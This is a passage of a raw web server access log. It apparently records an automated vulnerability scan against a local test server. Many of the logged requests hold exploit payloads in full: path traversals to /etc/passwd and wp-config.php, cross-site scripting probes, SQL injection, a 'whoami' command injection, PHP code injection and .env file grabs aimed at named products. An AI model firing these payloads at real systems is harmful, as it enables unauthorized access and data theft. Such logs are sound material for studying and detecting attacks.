+0000","request_body":"_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJ7e3VzZXJuYW1lfX0ifX0=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mgmt/shared/authn/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_bin/Authentication.asmx?op=Mode HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /HelpTheHelpDesk.jsdbx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lui/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /AirWatch/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /upload.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.development.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cs/ContentServer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"{\x22client\x22:\x22wheel_async\x22,\x22fun\x22:\x22pillar_roots.write\x22,\x22data\x22:\x22testing\x22,\x22path\x22:\x22../../../../../../../tmp/testing\x22,\x22username\x22:\x221\x22,\x22password\x22:\x221\x22,\x22eauth\x22:\x22pam\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/images/componentutilslogin.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/easy-media-gallery-pro/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"password=12345","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PRESENTATION/EPSONCONNECT HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SecMail/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hub/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /versa/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed.servlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nextcloud/index.php/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/administrator/images/componentutilslogin.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/device-id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448 HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/view?filename=/etc/passwd&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"more=0&host=0&username=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=&db=&lang=en_us&expire=3","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?action=login.index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/welcome/default/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /shop/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/Dashboard.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authentication/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /super/login.html?lang=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/login.htm?type=probes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) 